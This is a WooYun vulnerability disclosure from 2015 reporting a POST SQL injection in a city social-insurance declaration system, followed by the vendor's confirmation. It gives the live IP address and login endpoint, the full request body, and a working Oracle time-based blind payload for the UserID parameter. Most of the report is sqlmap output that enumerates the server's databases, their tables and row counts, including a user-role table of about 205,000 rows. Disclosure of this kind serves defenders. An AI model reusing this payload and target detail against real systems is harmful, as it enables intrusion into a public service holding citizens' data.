当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112959

漏洞标题:某市社会保险申报系统存在POST注射

相关厂商:广东省信息安全测评中心

漏洞作者: Yang

提交时间:2015-05-18 17:30

修复时间:2015-07-03 16:24

公开时间:2015-07-03 16:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-18: 细节已通知厂商并且等待厂商处理中
2015-05-19: 厂商已经确认,细节仅向厂商公开
2015-05-29: 细节向核心白帽子及相关领域专家公开
2015-06-08: 细节向普通白帽子公开
2015-06-18: 细节向实习白帽子公开
2015-07-03: 细节向公众公开

简要描述:

某市社会保险申报系统存在POST注射

详细说明:

http://113.106.218.163:8001/grcx/action/LoginAction (POST)
UserType=4&DWSXH=88952634&GMSFHM=88952634&ZSXM=88952634&Password=88952634&imagecheck=88952634&SZDW=88952634&UserID=88952634

1.png


1.png


sqlmap identified the following injection points with a total of 1765 HTTP(s) requests:
---
Parameter: UserID (POST)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: UserType=4&DWSXH=88952634&GMSFHM=88952634&ZSXM=88952634&Password=88952634&imagecheck=88952634&SZDW=88952634&UserID=88952634' AND 1805=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(80)||CHR(110)||CHR(107),5) AND 'dgZI'='dgZI
---
web application technology: JSP
back-end DBMS: Oracle
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: UserID (POST)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: UserType=4&DWSXH=88952634&GMSFHM=88952634&ZSXM=88952634&Password=88952634&imagecheck=88952634&SZDW=88952634&UserID=88952634' AND 1805=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(80)||CHR(110)||CHR(107),5) AND 'dgZI'='dgZI
---
web application technology: JSP
back-end DBMS: Oracle
available databases [26]:
[*] "CTXSYS\X03"
[*] "H`WSSB"
[*] "HR\X11"
[*] "OE\T"
[*] "QS_WS\X03"
[*] "XDY\X02"
[*] HZWSSB_CS
[*] MDSYS
[*] ODM
[*] OEM_MTR
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_aS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS


[*] "CTXSYS"
[*] "H`WSSB"
[*] "HR"
[*] "OE	"
[*] "QS_WS"
[*] "XDY"
[*] HZWSSB_CS
[*] MDSYS
[*] ODM
[*] OEM_MTR
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_aS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
Database: WKSYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| WK$CHARSET                  | 57      |
| WK$MIMETYPES                | 35      |
| WK$LANG                     | 14      |
| WK$SYS_CONFIG               | 1       |
+-----------------------------+---------+
Database: HZWSSB_CS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| S_U_USER_TO_ROLE            | 205073  |
| RECV_DETAIL                 | 21877   |
| RECVSTAT                    | 6740    |
| SJCJ_YWJL_0424              | 3480    |
| SJCJ_ZHCS                   | 2755    |
| SJCJ_SCJL                   | 2630    |
| SJCJ_YWJL_SH                | 1925    |
| SENDSTAT                    | 1200    |
| CSINTERFACELOG              | 751     |
| SJCJ_YWJL                   | 177     |
| SJCJ_SPGZ                   | 144     |
| SJCJ_TJJL_SH                | 122     |
| SYSTAB_DICTIONARY_DATA      | 73      |
| S_U_ROLE_TO_RIGHT           | 69      |
| SJCJ_GRZL                   | 62      |
| SYS_CXLBCS                  | 59      |
| S_U_RIGHT                   | 57      |
| SYS_GENTBL_CONF             | 57      |
| SYS_GENTBL_QUERYSQL         | 33      |
| S_R_NOTES                   | 29      |
| SYS_COMMIT_SQL              | 21      |
| SYS_SEQUENCE                | 19      |
| T_PH                        | 18      |
| S_WZM                       | 16      |
| S_XZSZ                      | 12      |
| SJCJ_TJJL                   | 12      |
| SJCJ_MMCSHMX                | 11      |
| SJCJ_SCWJ                   | 11      |
| SJCJ_WSMMBH                 | 6       |
| S_U_ROLE                    | 5       |
| SYS_BULLETIN                | 3       |
| S_DUAL                      | 1       |
| S_U_ORG                     | 1       |
| SYSTAB_DYNDICT              | 1       |
+-----------------------------+---------+
Database: QS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| AQ$_AQ$_MEM_MC_S            | 1       |
| AQ$_QS_ORDERS_PR_MQTAB_S    | 1       |
+-----------------------------+---------+
Database: ORDSYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| ORD_CARTRIDGE_COMPONENTS    | 86      |
| JACCELERATOR$DLLS           | 14      |
+-----------------------------+---------+
Database: QS_ES
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| AQ$_QS_ES_ORDERS_MQTAB_S    | 1       |
| AQ$_QS_ES_ORDERS_PR_MQTAB_S | 1       |
+-----------------------------+---------+
Database: OLAPSYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| CWM$ITEMUSE                 | 118     |
| CWM$LEVELATTRIBUTE          | 67      |
| CWM$CLASSIFICATIONENTRY     | 66      |
| CWM$ITEMMAP                 | 59      |
| CWM$LEVEL                   | 27      |
| CWM$CLASSIFICATION          | 24      |
| CWM$DIMENSIONATTRIBUTE      | 23      |
| CWM$DOMAIN                  | 21      |
| CWM$FUNCTION                | 13      |
| CWM$CLASSIFICATIONTYPE      | 10      |
| CWM$OBJECTTYPE              | 10      |
| CWM$CUBEDIMENSIONUSE        | 7       |
| CWM$FACTLEVELUSE            | 7       |
| CWM$DIMENSION               | 5       |
| CWM$PARAMETER               | 5       |
| CWM$FACTUSE                 | 4       |
| CWM$FUNCTIONUSE             | 4       |
| CWM$MEASURE                 | 4       |
| CWM$MEASUREDIMENSIONUSE     | 4       |
| CWM$MODEL                   | 3       |
| CWM$PROJECT                 | 3       |
| CWM$CUBE                    | 2       |
| CWM$FACTTABLEMAP            | 2       |
+-----------------------------+---------+
Database: QS_CS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| AQ$_QS_CS_ORDER_STATUS_QT_S | 1       |
+-----------------------------+---------+
Database: SYSTEM
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| HELP                        | 918     |
| AQ$_QUEUES                  | 40      |
| REPCAT$_OBJECT_TYPES        | 28      |
| REPCAT$_RESOLUTION_METHOD   | 19      |
| "LOGMNR_SESSIO\?81$"        | 4       |
| REPCAT$_TEMPLATE_STATUS     | 3       |
| REPCAT$_AUDIT_ATTRIBUTE     | 2       |
| REPCAT$_TEMPLATE_TYPES      | 2       |
+-----------------------------+---------+
Database: SH
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| SALES                       | 1016271 |
| COSTS                       | 787766  |
| FWEEK_PSCAT_SALES_MV        | 149325  |
| CUSTOMERS                   | 50000   |
| PRODUCTS                    | 10000   |
| TIMES                       | 1461    |
| PROMOTIONS                  | 501     |
| CAL_MONTH_SALES_MV          | 35      |
| COUNTRIES                   | 19      |
| CHANNELS                    | 5       |
+-----------------------------+---------+
Database: SCOTT
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| EMP                         | 14      |
| SALGRADE                    | 5       |
| DEPT                        | 4       |
+-----------------------------+---------+
Database: ODM
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| ODM_ERROR_TABLE             | 342     |
| ODM_CONFIGURATION           | 25      |
| ODM_INTERNAL_CONFIGURATION  | 19      |
| ODM_PMML_DTD                | 1       |
+-----------------------------+---------+
Database: QS_CBADM
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| AQ$_QS_CBADM_ORDERS_MQTAB_S | 3       |
+-----------------------------+---------+
Database: RMAN
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| CONFIG                      | 1       |
| RCVER                       | 1       |
+-----------------------------+---------+
Database: MDSYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| CS_SRS                      | 1000    |
| SDO_DATUMS                  | 118     |
| MD$RELATE                   | 90      |
| SDO_DIST_UNITS              | 54      |
| SDO_AREA_UNITS              | 48      |
| SDO_ELLIPSOIDS              | 47      |
| SDO_PROJECTIONS             | 42      |
| SDO_ANGLE_UNITS             | 12      |
+-----------------------------+---------+
Database: WMSYS
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| WM$WORKSPACE_PRIV_TABLE     | 8       |
| WM$ENV_VARS                 | 1       |
| WM$VERSION_HIERARCHY_TABLE  | 1       |
| WM$WORKSPACES_TABLE         | 1       |
+-----------------------------+---------+
Database: PM
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| ONLINE_MEDIA                | 9       |
| PRINT_MEDIA                 | 4       |
+-----------------------------+---------+

漏洞证明:

1.png

修复方案:

版权声明:转载请注明来源 Yang@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-05-19 16:22

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无